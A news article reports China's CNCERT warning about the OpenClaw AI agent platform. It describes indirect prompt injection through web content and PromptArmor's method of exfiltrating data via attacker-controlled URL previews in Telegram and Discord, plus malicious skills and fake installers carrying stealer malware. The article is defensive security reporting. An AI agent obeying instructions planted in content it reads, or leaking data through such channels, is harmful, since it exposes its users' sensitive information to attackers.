OpenClaw AI Vulnerabilities Risk Prompt Injection, Data Breach
China’s National Computer Network Emergency Response Technical Team (CNCERT) has raised alarms about vulnerabilities associated with OpenClaw, an open-source AI platform. Formerly known as Clawdbot and Moltbot, OpenClaw exhibits significant security weaknesses due to its default configurations. The platform grants privileged access essential for its autonomous task execution, making it appealing for exploitation by malicious actors.
Risks Associated with OpenClaw AI
The vulnerabilities primarily stem from prompt injection attacks. These attacks involve embedding harmful instructions within web content, tricking OpenClaw into leaking sensitive data. Such exploitative actions can take various forms, including:
- Indirect prompt injection (IDPI)
- Cross-domain prompt injection (XPIA)
Researchers at PromptArmor have demonstrated that URL previews in messaging applications like Telegram and Discord can serve as pathways for data exfiltration. By controlling the URL generated by OpenClaw, attackers can capture sensitive data without users needing to engage directly with malicious links.
Additional Security Concerns
Beyond prompt injection threats, CNCERT identifies several other critical risks associated with OpenClaw:
- The potential irreversible deletion of essential information due to misinterpreted user instructions.
- Malicious skill uploads to repositories that can execute arbitrary commands or install malware.
- Exploitation of known security vulnerabilities that could lead to data breaches.
In sectors critical to national security and economy, such as finance and energy, these breaches could compromise vital business intelligence and operational capabilities.
Recommendations for Enhanced Security
To address these vulnerabilities, users and organizations are urged to implement several security measures:
- Strengthen network controls to enhance overall security.
- Avoid exposing OpenClaw’s management port to the internet.
- Isolate the service within a container.
- Ensure that credentials are stored securely and not in plaintext.
- Download skills exclusively from trusted sources.
- Disable automatic updates for skills to prevent unauthorized changes.
- Regularly update the AI agent to mitigate known threats.
Government Actions and Malware Campaigns
In response to the escalating security risks, Chinese authorities have moved to prevent state-run enterprises and government agencies from utilizing OpenClaw. This ban also applies to military personnel’s families.
The popularity of OpenClaw has attracted malicious actors who exploit this trend to distribute harmful software disguised as legitimate OpenClaw installers. Reports indicate these malicious repositories, often hosted on GitHub, deliver information-stealing malware like Atomic and Vidar Stealer, along with a proxy tool known as GhostSocks.
As users seek to install OpenClaw, these repositories have surfaced as top search results, increasing the likelihood of attacks. Vigilance and robust security practices are essential to safeguard against these evolving threats.
